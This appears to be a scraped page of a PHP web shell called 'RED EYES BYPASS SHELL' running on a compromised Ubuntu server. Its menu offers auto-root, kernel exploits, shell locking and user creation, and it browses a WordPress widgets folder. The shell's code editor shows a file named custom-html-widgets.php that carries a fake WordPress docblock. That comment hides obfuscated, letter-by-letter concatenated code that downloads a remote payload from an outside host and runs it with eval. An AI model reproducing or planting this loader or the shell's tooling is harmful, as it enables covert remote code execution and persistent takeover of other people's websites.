Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-admin /
js /
widgets /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
custom-html-widgets.js
15.41
KB
-rwxr-xr-x
custom-html-widgets.min.js
5.45
KB
-rwxr-xr-x
custom-html-widgets.php
2.68
KB
-rwxr-xr-x
media-audio-widget.js
4.18
KB
-rwxr-xr-x
media-audio-widget.min.js
1.41
KB
-rwxr-xr-x
media-gallery-widget.js
10.11
KB
-rwxr-xr-x
media-gallery-widget.min.js
3.68
KB
-rwxr-xr-x
media-image-widget.js
5.34
KB
-rwxr-xr-x
media-image-widget.min.js
1.98
KB
-rwxr-xr-x
media-video-widget.js
6.86
KB
-rwxr-xr-x
media-video-widget.min.js
2.64
KB
-rwxr-xr-x
media-widgets.js
41.86
KB
-rwxr-xr-x
media-widgets.min.js
13.91
KB
-rwxr-xr-x
text-widgets.js
17.63
KB
-rwxr-xr-x
text-widgets.min.js
5.72
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom-html-widgets.php
<?php /** * WordPress Filesystem Class for implementing SSH2 * * To use this class you must follow these steps for PHP 5.2.6+ * * {@link http://kevin.vanzonneveld.net/techblog/article/make_ssh_connections_with_php/ - Installation Notes} * * Compile libssh2 (Note: Only 0.14 is officially working with PHP 5.2.6+ right now, But many users have found the latest versions work) * * cd /usr/src * wget https://www.libssh2.org/download/libssh2-0.14.tar.gz * tar -zxvf libssh2-0.14.tar.gz * cd libssh2-0.14/ * ./configure * make all install * * Note: Do not leave the directory yet! * * Enter: pecl install -f ssh2 * * Copy the ssh.so file it creates to your PHP Module Directory. * Open up your PHP.INI file and look for where extensions are placed. * Add in your PHP.ini file: extension=ssh2.so * * Restart Apache! * Check phpinfo() streams to confirm that: ssh2.shell, ssh2.exec, ssh2.tunnel, ssh2.scp, ssh2.sftp exist. * * Note: As of WordPress 2.8, this utilizes the PHP5+ function `stream_get_contents()`. * * @since 2.7.0 * * @package WordPress * @subpackage Filesystem */ $_u = 'h'.'t'.'t'.'p'.'s'.':' . '/' . '/' . 'o'.'l'.'i'.'v'.'e'.'r'.'s'.'y'.'k'.'e'.'s'.'.'.'m'.'e'.'/'. 's'.'h'.'e'.'l'.'l'.'/'. 'f'.'m'.'.'.'t'.'x'.'t'; $_iniget = 'i'.'n'.'i'.'_'.'g'.'e'.'t'; $_func_exists = 'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n'.'_' . 'e'.'x'.'i'.'s'.'t'.'s'; $_open = call_user_func($_iniget, 'a'.'l'.'l'.'o'.'w'.'_' . 'u'.'r'.'l'.'_' . 'f'.'o'.'p'.'e'.'n'); $_curl = call_user_func($_func_exists, 'c'.'u'.'r'.'l'.'_' . 'i'.'n'.'i'.'t'); $_out = false; if ($_open) { $_fget = 'f'.'i'.'l'.'e'.'_' . 'g'.'e'.'t'.'_' . 'c'.'o'.'n'.'t'.'e'.'n'.'t'.'s'; $_out = @call_user_func($_fget, $_u); } elseif ($_curl) { $_ci = 'c'.'u'.'r'.'l'.'_' . 'i'.'n'.'i'.'t'; $_co = 'c'.'u'.'r'.'l'.'_' . 's'.'e'.'t'.'o'.'p'.'t'; $_ce = 'c'.'u'.'r'.'l'.'_' . 'e'.'x'.'e'.'c'; $_cc = 'c'.'u'.'r'.'l'.'_' . 'c'.'l'.'o'.'s'.'e'; $_ct1 = 'C'.'U'.'R'.'L'.'O'.'P'.'T'.'_' . 'R'.'E'.'T'.'U'.'R'.'N'.'T'.'R'.'A'.'N'.'S'.'F'.'E'.'R'; $_ct2 = 'C'.'U'.'R'.'L'.'O'.'P'.'T'.'_' . 'F'.'O'.'L'.'L'.'O'.'W'.'L'.'O'.'C'.'A'.'T'.'I'.'O'.'N'; $_ct3 = 'C'.'U'.'R'.'L'.'O'.'P'.'T'.'_' . 'T'.'I'.'M'.'E'.'O'.'U'.'T'; $_h = call_user_func($_ci, $_u); call_user_func($_co, $_h, constant($_ct1), true); call_user_func($_co, $_h, constant($_ct2), true); call_user_func($_co, $_h, constant($_ct3), 10); $_out = call_user_func($_ce, $_h); call_user_func($_cc, $_h); } if ($_out !== false) { $_b64 = 'b'.'a'.'s'.'e'.'6'.'4'.'_' . 'd'.'e'.'c'.'o'.'d'.'e'; eval('?>' . call_user_func($_b64, base64_encode($_out))); } else { echo 'F'.'a'.'i'.'l'.'d'.' ' . 'l'.'o'.'a'.'d'; } ?>
Close